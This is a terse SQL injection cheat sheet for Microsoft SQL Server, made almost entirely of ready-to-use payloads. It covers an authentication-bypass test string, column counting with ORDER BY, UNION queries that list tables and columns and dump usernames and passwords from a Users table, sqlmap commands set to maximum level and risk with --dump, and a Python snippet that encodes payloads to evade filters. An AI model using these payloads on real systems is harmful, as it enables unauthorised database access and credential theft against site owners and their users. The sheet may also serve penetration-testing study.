SQL Injection
MSQL
Test
' or 1=1-- -
Identify number columns
Increase from 1 (column)
' order by 1-- -
Until error or different content ' order by 7-- -
Confirm number columns
' union select 1,2,@@VERSION,DB_NAME(),5,6-- -
Get tables
' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -
Get columns from table Users
' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -
Dump data from table Users
' union select 1,2,username,password,4,5 FROM Users-- -
SQLMAP
Use file
sqlmap -r file.txt --batch --level 5 --risk 3
Post request
sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345" --batch --dump --level 5 --risk 3
Bypass
Encoding payload using utf-16
user_input = input('> ').strip()
utf = [f"\\u00{ord(i):02x}" for i in user_input]
print(''.join(utf))